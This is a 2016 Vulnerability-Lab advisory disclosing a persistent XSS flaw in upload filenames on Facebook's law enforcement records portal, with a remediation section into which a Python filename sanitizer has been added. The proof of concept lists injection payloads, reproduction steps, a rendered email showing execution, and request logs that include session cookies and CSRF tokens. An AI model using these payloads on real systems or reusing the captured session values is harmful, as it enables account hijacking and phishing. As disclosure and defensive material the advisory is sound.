Facebook (Law Enforcement) - Persistent Vulnerability

Facebook Law Enforcement service has a persistent cross-site scripting vulnerability

Document Title:
===============
Facebook (Law Enforcement) - Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1767


Release Date:
=============
2016-09-30


Vulnerability Laboratory ID (VL-ID):
====================================
1767


Common Vulnerability Scoring System:
====================================
3.8


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
Facebook is a corporation and online social networking service headquartered in Menlo Park, California, in the United States. Its website was launched on 
February 4, 2004, by Mark Zuckerberg with his Harvard College roommates and fellow students Eduardo Saverin, Andrew McCollum, Dustin Moskovitz and Chris 
Hughes. The founders initially limited the website's membership to Harvard students, but later expanded it to colleges in the Boston area, the Ivy 
League, and Stanford University. It gradually added support for students at various other universities and later for high-school students. Since 2006, 
anyone who is at least 13 years old has been allowed to become a registered user of the website, though the age requirement may be higher depending on 
applicable local laws. Its name comes from the face book directories often given to American university students.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Facebook )

These operational guidelines are for law enforcement officials seeking records from Facebook. For private party requests, including requests from civil 
litigants and criminal defendants, visit: facebook.com/help/?page=1057. Users seeking information on their own accounts can access Facebook’s “Download 
Your Information” feature from their account settings. See facebook.com/help/?page=18830. This information may change at any time.

(Copy of the Homepage: https://www.facebook.com/safety/groups/law/guidelines/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered an application-side mail encoding web vulnerability in the official Facebook Law Enforcement online service web-application.


Vulnerability Disclosure Timeline:
==================================
2016-10-01: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
Low


Authentication Type:
====================
Open Authentication (Anonymous Privileges)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
An application-side mail encoding web vulnerability has been discovered in the official Facebook Law Enforcement online service web-application.
The vulnerability allows remote attackers to inject their own malicious script code on the application side of the vulnerable service or module context.

The vulnerability is located in the `filename` value of the picture/file upload in the `Records Request` module. The validation procedure of the POST 
method request to the `records/x/case/` function allows malicious script code to be injected. After the injection, the law enforcement operator (FBI) 
queries the document from the MIME attachment header once the issue has been submitted, and the content is re-sent as a copy to the sender's email 
address. That content is not securely parsed or encoded in the email context, which allows an attacker to inject persistent malicious script code 
into the outgoing emails of `records.facebook.com`.

Normally the email content carrying the filename value needs to be encoded when the law enforcement reply is sent as a copy via email. The encoding 
is broken and allows execution of the injected malicious script code in the `mimeAttachmentHeaderName`. Only the filename values are displayed in the 
email content, as a copy of the input stored in the database management system. Not only is the encoding of the reply email broken; it also appears 
that the arriving email already carries an executable vector, which needs to be confirmed internally before the issue can finally be patched.

The security risk of the application-side input web vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 3.8. 
Exploitation of the persistent web vulnerability requires a low privileged Facebook law enforcement account with restricted access and low or medium user interaction. 
Successful exploitation of the vulnerability results in persistent phishing mails, session hijacking, persistent external redirects to malicious sources and 
application-side manipulation of affected or connected module context.

Request Method(s):
				[+] POST

Vulnerable Input(s)
				[+] Documentation (File Upload)

Vulnerable Parameter(s):
				[+] filename as (mimeAttachmentHeaderName)

Affected Module(s):
				[+] records.facebook.com - Email Notify & Copy


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers with a low privileged web-application user account and low or medium user interaction.
For a security demonstration or to reproduce the vulnerability, follow the information and steps provided below.


Manual steps to reproduce the vulnerability ...
1. Register with the law enforcement web-application
2. Attach an HTTP session tamper such as Tamper Data, HTTP Headers or Burp Suite
3. Open the x/case module (https://www.facebook.com/records/x/case/)
4. Fill in random existing values and load a picture via the upload path
5. Start the session tamper for the HTTP protocol and click the submit button to save the entry for request validation
6. Inject your own script code payload into the filename value of the add form's POST method request
7. Continue the request and wait for the 200 OK reply of the web-server
8. After the message "Successful Submit" you can close the account
9. Open the mailbox and wait for the reply to arrive with the HTML code inside the mimeAttachmentHeaderName
10. The mail arrives and the payload executes in the mimeAttachmentHeaderName section of the email with the copy attachment
11. Successful reproduction of the application-side mail encoding web vulnerability in the law enforcement web-application of Facebook!


PoC: Payloads
<img src=x onerror=prompt("PENTESTFBOOK");><iframe src=a>%20<iframe>2.png
<img src=x onerror=prompt("PENTESTFBOOK");>
<iframe src=a>%20<iframe>2.png


PoC: Vulnerable Source (eMail)
Thank you,
Law Enforcement Response Team
---
NOTICE: This email (including any attachments) may contain information that is private, confidential, or protected by attorney-client or other privilege. 
Unless you are the intended recipient, you may not use, copy, or retransmit the email or its contents.

For more information please visit: <a class="moz-txt-link-freetext" href="https://www.facebook.com/safety/groups/law/guidelines/">https://www.facebook.com/safety/groups/law/guidelines/</a> 
</pre></div><BR><FIELDSET CLASS="mimeAttachmentHeader">
<LEGEND CLASS="mimeAttachmentHeaderName"><img src=x onerror=prompt("PENTESTFBOOK");><iframe src=evil.source>>%20<iframe>2.png[PERSISTENT SCRIPT CODE EXECUTION!]</LEGEND></FIELDSET><BR/>
<P><CENTER><IMG CLASS="moz-attached-image" shrinktofit="yes" SRC="imap-message://admin%40evolution-sec%[email protected]/INBOX#21121?header=saveas&part=1.2&type=image/png&filename=<img src=x onerror=prompt("PENTESTFBOOK");><iframe src=a>%20<iframe>2.png[PERSISTENT SCRIPT CODE EXECUTION!]"></CENTER><P><BR><FIELDSET CLASS="mimeAttachmentHeader"><LEGEND CLASS="mimeAttachmentHeaderName"><img src=x onerror=prompt("PENTESTFBOOK");><iframe src=a>%20<iframe>2.png[PERSISTENT SCRIPT CODE EXECUTION!]</LEGEND></FIELDSET><BR/><P><CENTER><IMG CLASS="moz-attached-image" shrinktofit="yes" SRC="imap-message://admin%40evolution-sec%[email protected]/INBOX#21121?header=saveas&part=1.3&type=image/png&filename=<img src=x onerror=prompt("PENTESTFBOOK");><iframe src=a>%20<iframe>2.png[PERSISTENT SCRIPT CODE EXECUTION!]"></CENTER><P><BR><FIELDSET CLASS="mimeAttachmentHeader"><LEGEND CLASS="mimeAttachmentHeaderName"><img src=x onerror=prompt("PENTESTFBOOK");><iframe src=a>%20<iframe>2.png[PERSISTENT SCRIPT CODE EXECUTION!]</LEGEND></FIELDSET><BR/><P><CENTER><IMG CLASS="moz-attached-image" shrinktofit="yes" SRC="imap-message://admin%40evolution-sec%[email protected]/INBOX#21121?header=saveas&part=1.4&type=image/png&filename=<img src=x onerror=prompt("PENTESTFBOOK");><iframe src=a>%20<iframe>2.png[PERSISTENT SCRIPT CODE EXECUTION!]"></CENTER><P></body>
</html>


--- PoC Session Logs [POST] (Inject) ---
Status: 200[OK]
POST https://www.facebook.com/records/x/case/send/731924/?__pc=EXP1%3ADEFAULT&__user=100001940496405&__a=1&__dyn=7AzHK5lyEogDxyKHzGgnyp8doyGzEyeArWo8pojByUW3F6xybxu13wIwYxZi28cWwADKuEjwKze78dUO3K5Vqxm2Pwgolw&__req=7&fb_dtsg=AQEHDmx7wF4G
%3AAQGzmhEPkS02&ttstamp=2658169726810912055119705271586581711221091046980107834850&__rev=2198838 Load Flags[LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[-1] Mime Type[application/x-javascript]
Request Header:
      Host[www.facebook.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate, br]
      Referer[https://www.facebook.com/records/x/case/731924/]
      Content-Length[1691]
      Content-Type[multipart/form-data; boundary=---------------------------3867324226368]
      Cookie
[lp=WVZYdXVnWWJrTW0wbWdWzuSQ7QyNPtPa-1U0mhe-aOMd88ie7bPIyGmXM6UAAA; datr=TcfOVtlvXJbBSbTfOugSOlWj; c_user=100001940496405; fr=04dYLQHkFoDZoE5DJ.AWUhBsIOZVX9x78J7bt2Lev2irM.BWzsfS.hc.FbO.0.AWXNw4Y_; xs=9%3An5Zz2GnvrtzlIQ
%3A2%3A1456392145%3A3802; csm=2; s=Aa71wz9bptT4vSNS.BWzsfS; pl=n; lu=RhEUCTQlmd24A8j8ztqbqNVw; p=-2; a11y=%7B%22sr%22%3A0%2C%22sr-ts%22%3A1456392145134%2C%22jk%22%3A0%2C%22jk-ts%22%3A1456392145134%2C%22kb%22%3A1%2C%22kb-ts
%22%3A1456392145134%2C%22hcm%22%3A0%2C%22hcm-ts%22%3A1456392145134%7D; act=1456395897902%2F6; 
presence=EDvF3EtimeF1456395917EuserFA21B01940496405A2EstateFDt2F_5b_5dElm2FnullEuct2F1456393960328EtrFA2loadA2EtwF2551571863EatF1456395816948G456395917033CEchFDp_5f1B01940496405F29CC; wd=1920x875]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------3867324226368
Content-Disposition: form-data; name="fb_dtsg"
AQEHDmx7wF4G:AQGzmhEPkS02
-----------------------------3867324226368
Content-Disposition: form-data; name="correspondence"
abc<img src=x onerror=prompt(23);><iframe src=evil.source>%20<iframe>
-----------------------------3867324226368
Content-Disposition: form-data; name="documents[]"; filename="abc<img src=x onerror=prompt(23);><iframe src=evil.source>>%20<iframe>2.png[PERSISTENT SCRIPT CODE INJECT VIA POST!]"
Content-Type: image/png
-
Status: 200[OK]
POST https://www.facebook.com/ajax/bz Load Flags[LOAD_BACKGROUND  LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[-1] Mime Type[application/x-javascript]
   Request Header:
      Host[www.facebook.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate, br]
      Content-Type[application/x-www-form-urlencoded]
      Referer[https://www.facebook.com/records/x/settings/]
      Content-Length[1708]
      Cookie[datr=TcfOVtlvXJbBSbTfOugSOlWj; c_user=100001940496405; 
fr=04dYLQHkFoDZoE5DJ.AWUhBsIOZVX9x78J7bt2Lev2irM.BWzsfS.hc.FbO.0.AWXNw4Y_; xs=9%3An5Zz2GnvrtzlIQ%3A2%3A1456392145%3A3802; csm=2; s=Aa71wz9bptT4vSNS.BWzsfS; pl=n; lu=RhEUCTQlmd24A8j8ztqbqNVw; p=-2; a11y=%7B%22sr%22%3A0%2C%22sr-ts
%22%3A1456392145134%2C%22jk%22%3A0%2C%22jk-ts%22%3A1456392145134%2C%22kb%22%3A1%2C%22kb-ts%22%3A1456392145134%2C%22hcm%22%3A0%2C%22hcm-ts%22%3A1456392145134%7D; act=1456396112742%2F12; 
presence=EDvF3EtimeF1456395917EuserFA21B01940496405A2EstateFDt2F_5b_5dElm2FnullEuct2F1456393960328EtrFA2loadA2EtwF2551571863EatF1456395816948G456395917033CEchFDp_5f1B01940496405F29CC; wd=1920x875; x-src=%2Frecords%2Fx%2Fsettings%2F
%7Ccontent]
      Connection[keep-alive]
   POST-Daten:
      __a[1]
      __dyn[7AmajEzURoG649UoHaEWC5ECiq2W8GAdy8VdLFwxBxembzEeAq68K5UcU-2CEf8vkwy3eEjx2uVWxe6okze48K3ucDwPK4VqCzEbe7898lw]
      __req[c]
      __rev[2198838]
      __user[100001940496405]
      fb_dtsg[AQEHDmx7wF4G%3AAQGzmhEPkS02]
      ph[V3]
      q[%5B%7B%22user%22%3A%22100001940496405%22%2C%22page_id%22%3A%225rcjz6%22%2C%22posts%22%3A%5B%5B%22time_spent_bit_array%22%2C%7B%22tos_id%22%3A%225rcjz6%22%2C
%22start_time%22%3A1456395943%2C%22tos_array%22%3A%5B1559039%2C1071769328%5D%2C%22tos_len%22%3A64%2C%22tos_seq%22%3A1%2C%22tos_cum%22%3A39%7D%2C1456396007617%2C1%5D%2C%5B%22time_spent_bit_array%22%2C%7B%22tos_id%22%3A%225rcjz6%22%2C
%22start_time%22%3A1456396034%2C%22tos_array%22%3A%5B1074381055%2C261953%5D%2C%22tos_len%22%3A64%2C%22tos_seq%22%3A2%2C%22tos_cum%22%3A64%7D%2C1456396098374%2C1%5D%2C%5B%22click_ref_logger%22%2C%5B%220Q0J%22%2C1456396108048%2C%22act
%22%2C1456396108046%2C8%2C%22https%3A%2F%2Fwww.facebook.com%2Frecords%2Fx%2Fsettings%2F%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Frecords%2Fx%2Fcase%2F731924%2F%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D
%2C1420%2C304%2C10%2C1883%2C%225rcjz6%22%2C%22XLawEnforcementPortalViewCaseController%22%5D%2C1456396108048%2C1%5D%2C%5B%22click_ref_logger%22%2C%5B%220Q0J%22%2C1456396112743%2C%22act%22%2C1456396112742%2C12%2C%22https%3A%2F
%2Fwww.facebook.com%2Frecords%2Fx%2Fsettings%2F%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Frecords%2Fx%2Fsettings%2F%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C1400%2C304%2C10%2C1883%2C%225rcjz6%22%2C
%22XLawEnforcementPortalViewCaseController%22%5D%2C1456396112743%2C0%5D%5D%2C%22trigger%22%3A%22click_ref_logger%22%7D%5D]
      ts[1456396112765]
      ttstamp[2658169726810912055119705271586581711221091046980107834850]
Response Header:
      X-Frame-Options[DENY]
      Cache-Control[private, no-cache, no-store, must-revalidate]
      Expires[Sat, 01 Jan 2000 00:00:00 GMT]
      content-security-policy[default-src * data: blob:;script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.virtualearth.net *.google.com 127.0.0.1:* *.spotilocal.com:* 'unsafe-inline' 'unsafe-eval' fbstatic-a.akamaihd.net fbcdn-static-b-a.akamaihd.net *.atlassolutions.com blob:;style-src * 'unsafe-inline' data:;connect-src *.facebook.com *.fbcdn.net *.facebook.net *.spotilocal.com:* *.akamaihd.net wss://*.facebook.com:* https://fb.scanandcleanlocal.com:* *.atlassolutions.com attachment.fbsbx.com blob:;]
      Access-control-allow-credentials[true]
      p3p[CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"]
      Strict-Transport-Security[max-age=15552000; preload]
      Pragma[no-cache]
      Vary[Origin, Accept-Encoding]
      access-control-allow-origin[https://www.facebook.com]
      Access-Control-Expose-Headers[X-FB-Debug]
      public-key-pins-report-only[max-age=500; pin-sha256="WoiWRyIOVNa9ihaBciRSC7XHjliYS9VwUGOIud4PB18="; pin-sha256="r/mIkG3eEpVdm+u/ko/cwxzOMo1bk4TyHIlByibiA5E="; pin-sha256="q4PO2G2cbkZhZ82+JgmRUyGMoAeozA+BSXVXQWB8XWQ="; report-uri="http://reports.fb.com/hpkp/"]
      access-control-allow-method[, OPTIONS]
      X-XSS-Protection[0]
      Content-Type[application/x-javascript; charset=utf-8]
      x-content-type-options[nosniff]
      Set-Cookie[wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=-1456396116; path=/; domain=.facebook.com; httponly]
      Content-Encoding[gzip]
      X-FB-Debug[+ZpWXXD1NWrARFtYBT2IzkpHssd/fJxzATuT8eq64tr+NEEMUkIzlq5E+q7hiqKZ6JoRa5U5wLf4d3ck83kNEw==]
      X-Firefox-Spdy[h2]


Account(s): Facebook Law Enforcement
[email protected]
[email protected]


Reference(s):
https://www.facebook.com/records/x/case/732871/
https://www.facebook.com/records/x/case/731924/
https://www.facebook.com/records/x/settings/
https://www.facebook.com/ajax/bz


Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely parsing and restricting the filename value in the `upload` POST method request.
Encode and filter the outgoing email of records.facebook.com, including the vulnerable `mimeAttachmentHeaderName` parameter, 
to prevent persistent script code injection attacks.
Set up a secure exception that captures the invalid request on upload and redirects the user back to the form with the values encoded.
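A defensive counterpart to the fix described above, added here as an example (not Facebook's code): it applies the two controls the advisory recommends, restricting the filename on upload and HTML-encoding it before it is placed in the outgoing mail's attachment header, and is exercised with the payload quoted in this advisory. The extension allow-list, the `example.invalid` address and the function names are assumptions.

```python
import html
import re
import unicodedata
from email.message import EmailMessage

# Constructed sample: the filename payload quoted in the advisory, as it arrives
# in the Content-Disposition header of the upload request.
SAMPLE_FILENAME = '<img src=x onerror=prompt("PENTESTFBOOK");><iframe src=a>%20<iframe>2.png'

# Hypothetical allow-list; the portal's real accepted document types are not on the page.
ALLOWED_TYPES = {"png": ("image", "png"), "jpg": ("image", "jpeg"), "jpeg": ("image", "jpeg"),
                 "gif": ("image", "gif"), "pdf": ("application", "pdf")}
_UNSAFE = re.compile(r"[^A-Za-z0-9._-]")
MAX_STEM = 64


def sanitize_upload_filename(raw: str, fallback: str = "upload") -> str:
    """Reduce a client-supplied filename to a conservative allow-listed form.

    Path components are dropped, every character outside [A-Za-z0-9._-] is
    removed, the extension must be allow-listed and the stem is length-capped.
    Raises ValueError so the caller rejects the upload instead of storing it.
    """
    name = unicodedata.normalize("NFKC", raw).replace("\\", "/").rsplit("/", 1)[-1]
    stem, dot, ext = name.rpartition(".")
    if not dot:                       # no extension at all: nothing to allow-list
        raise ValueError("missing extension")
    ext = _UNSAFE.sub("", ext).lower()
    if ext not in ALLOWED_TYPES:
        raise ValueError(f"extension not allowed: {ext!r}")
    stem = _UNSAFE.sub("", stem).strip("._-")[:MAX_STEM] or fallback
    return f"{stem}.{ext}"


def render_attachment_header(filename: str) -> str:
    """Return the fragment the advisory shows as mimeAttachmentHeaderName, with the
    filename HTML-escaped so any markup in it renders as text, not as elements."""
    return ('<fieldset class="mimeAttachmentHeader"><legend class="mimeAttachmentHeaderName">'
            f"{html.escape(filename, quote=True)}</legend></fieldset>")


def build_reply(raw_filename: str, data: bytes,
                to_addr: str = "requester@example.invalid") -> EmailMessage:
    """Build the copy-to-sender reply: the sanitized name is used in the HTML body and
    in the MIME part, and email.message encodes the Content-Disposition filename."""
    safe = sanitize_upload_filename(raw_filename)
    maintype, subtype = ALLOWED_TYPES[safe.rsplit(".", 1)[1]]
    msg = EmailMessage()
    msg["To"] = to_addr
    msg["Subject"] = "Copy of your records request"
    msg.set_content("<html><body><p>Attached document:</p>"
                    + render_attachment_header(safe) + "</body></html>", subtype="html")
    msg.add_attachment(data, maintype=maintype, subtype=subtype, filename=safe)
    return msg
```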


Security Risk:
==============
The security risk of the persistent mail encoding vulnerability in the filename value of the Facebook law enforcement web-application is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab [[email protected]] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, 
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. 

Domains:    www.vulnerability-lab.com		- www.vulnerability-db.com					- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partial use, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks 
of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material, contact (admin@) to ask for permission.

				    Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™
